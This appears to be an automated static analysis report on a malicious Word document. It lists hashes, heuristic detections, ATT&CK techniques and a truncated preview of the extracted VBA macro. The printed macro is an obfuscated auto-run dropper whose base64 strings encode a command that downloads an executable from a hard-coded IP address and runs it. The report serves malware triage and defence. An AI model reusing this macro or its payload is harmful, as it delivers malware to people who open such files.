Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 136922c7bd76aa5e…

MALICIOUS

Office (OLE)

206.0 KB Created: 2017-12-06 03:23:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: a975df206268f854e4c44f9ab2d0a74c SHA-1: a2327d8f023bef163e0fc48573431248e45c10a1 SHA-256: 136922c7bd76aa5ebc2e508b5ded77c3ea5ead7a035b51e8f2edff1bb233f09c
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Macro.Obfuscation-6332451-0' further supports the malicious nature of the macro. The script attempts to construct a URL from concatenated strings, but the full URL could not be reconstructed due to obfuscation.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17871 bytes
SHA-256: ee193471b1a85815ed58f2cd04f77e00d0caf7e057ba81f775a97159fd0e26f3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim AuC23L
AuC23L = Array("qn4lE", "mqRvNg", "xw0riC")
uJ0wLSXn = AuC23L(1)
Dim ktDI5E1x
ktDI5E1x = Array("X7itm", "pb6vOkAn", "H8qgd7Wj")
PycKPdl = ktDI5E1x(0)
OrNw5zM = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTk"
qjqP5c = "lSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNQzR4TkM0ek9DNDROeTlsYm1jdWRY"
edbLJZ = "QW5MbE53YkdsMEtDY3NKeWs3SkhCaGRHZ2dQU0FrWlc1Mk9uUmxiWEFnS3lBblhINTBiWEF1WlhobEp6dG1iM0psWVdOb0tDUnRlWFZ5YkNCcGJpQWtiWGwxY214ektYdDBjbmw3SkhkbFltTnNhV1Z1ZEM1RWIzZHViRzloWkVacGJHVW9KRzE1ZFhKc0xsUnZVM1J5YVc1bktDa3NJQ1J3WVhSb0tUdFRkR0Z5ZEMxUWNtOWpaWE"
Dim Y6PxqImoc
Y6PxqImoc = Array("Polmgs", "HbHB1", "dhizsH")
vEJN89Ui = Y6PxqImoc(0)
Dim UyB8wIY1
UyB8wIY1 = Array("xrDHNUqA", "niR2o")
iFszGy = UyB8wIY1(1)
Dim PDX9V
PDX9V = OrNw5zM & qjqP5c & edbLJZ
q5Gl2Zd = "56SUNSd"
UPHGX7 = "1lYUm9PMkp5WldGck8zMWpZWFJqYUh"
TWi9Qcvg = "0OWZRPT0="
If Len("AKUXJp8N3") <> 198 Then
' HlcewY8
Else
' B0KUAZid1
MsgBox "Q0BbEgZa", 26, "R9VeS"
End If
Dim iO8XI6dj
iO8XI6dj = q5Gl2Zd & UPHGX7 & TWi9Qcvg
Dim Yp8CF4
Yp8CF4 = Array("owhIVA795", "TeKyD4", "ymYx5rfP6")
kqWNhl = Yp8CF4(2)
Dim A9Au8z
A9Au8z = Array("WMrER3", "zbdvXGq")
lmser = A9Au8z(0)
Dim h5xmSRrA
h5xmSRrA = Array("fL7SmBnuI")
rhwUQCOXt = h5xmSRrA(0)
de1Xu = PDX9V & iO8XI6dj

Dim J5MNaXA2
J5MNaXA2 = Array("rGw5yKVen")
bQT0Pu = J5MNaXA2(0)
If Len("vKhdsvbr") <> 200 Then
' W1ayCdXu
Else
' OASUvq
MsgBox "zzicGV", 38, "he4R95DGW"
End If
Dim FR5r8J
FR5r8J = Array("Vk4Ff", "GAUER", "KkiUgtyHT")
LN97xQ = FR5r8J(2)
Dim h1fnxa7
h1fnxa7 = Array("ZwmKho", "yDz39GE1", "qqDMwlCSB")
iwnhEe = h1fnxa7(1)
sex de1Xu
End Sub

Attribute VB_Name = "E6yZucl"
Sub sex(y7REXlks)
If Len("IncidID") <> 251 Then
' yH8sXE
Else
' RyEmJ
MsgBox "njIdu", 57, "ctb2rpHy"
End If
Dim xZKjBxL
xZKjBxL = Array("CtIBOfR", "gtNQF")
DUzQs8q = xZKjBxL(0)
Dim ipq6IhE
ipq6IhE = Array("Q3gKR", "BweHg")
TKwEvfn9 = ipq6IhE(1)

Dim Urlaxe0
Urlaxe0 = Array("TieOlcot7")
V2iVjNfIq = Urlaxe0(0)
If Len("TmAMqvQ7") <> 172 Then
' M5LgErx
Else
' kdKWUA8X
MsgBox "D8O9Chf", 60, "H6pm5lskw"
End If
If Len("mAvLz") <> 162 Then
' YSLQAYPo
Else
' y7NUz
MsgBox "odKoxm8nj", 53, "bOCt9xw"
End If
Dim RocGfF
RocGfF = Array("RndWz", "LzMsY")
ujetI = RocGfF(0)
If Len("gL7GkE") <> 215 Then
' Q4J5V
Else
' yolaCZ
MsgBox "ugaDb0n", 30, "YBwT9"
End If
Dim AUT9Y
AUT9Y = Array("J73EaLHZM", "ZmpSx")
mSdK3 = AUT9Y(0)
Dim H6mJWn
H6mJWn = Array("oSZcO5", "egKhOsP")
V6WOD8X4 = H6mJWn(0)
Dim G7WRIrP
G7WRIrP = Array("G5HvQex", "wJVkWoR", "MrT1jAM03")
M3lyx = G7WRIrP(1)
Dim nPIuO8
nPIuO8 = Array("dcP3RlCj", "fjQWM", "n0XC1")
iq36CA = nPIuO8(2)
Dim m06t5uVf
m06t5uVf = Array("jT9bjeJ", "HxbWDa8yV")
xvboieC0s = m06t5uVf(1)
If Len("yhyS2uW") <> 165 Then
' AiKJAEXL
Else
' Af2MYkrc
MsgBox "WjAe3F", 47, "bXz6lS"
End If

Dim ngQNh7e
ngQNh7e = Array("aM4IsWn")
aH2jeBgP = ngQNh7e(0)
If Len("cNSzHr") <> 169 Then
' YiBGC
Else
' Dz39Q1
MsgBox "URvhCU", 43, "YWhU6"
End If
If Len("Lgjo0MtRr") <> 169 Then
' ShqED
Else
' IJqpdYxK
MsgBox "qUIit1R", 43, "PSBNIz"
End If

Dim kIgpOlaYD
kIgpOlaYD = Array("oSkAL7")
oBvjJ = kIgpOlaYD(0)
Dim hVeO1aMjN
hVeO1aMjN = Array("CQBGYvZVj", "KYGOFa", "qly1I")
muZd6Yex2 = hVeO1aMjN(0)
Dim P5mPQF
P5mPQF = Array("iM7APVpQu")
A2mZIb = P5mPQF(0)
Dim R1Ji97n
R1Ji97n = Array("g8iLFZ", "lgdKTlqN")
mmaoK = R1Ji97n(1)

Dim MgpGB
MgpGB = Array("SIyhns")
ArDNxZ = MgpGB(0)

Dim vjKP2
vjKP2 = Array("mVGuZ")
DP6Evf = vjKP2(0)
Dim Pajxz0H49
Pajxz0H49 = Array("du8XFxoQ1", "KF7TRmn")
Pb69zf = Pajxz0H49(0)
Dim wZvMf
wZvMf = Array("Cuz4U0Ly7", "hHg9qyIA", "qi7qKs")
acds
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.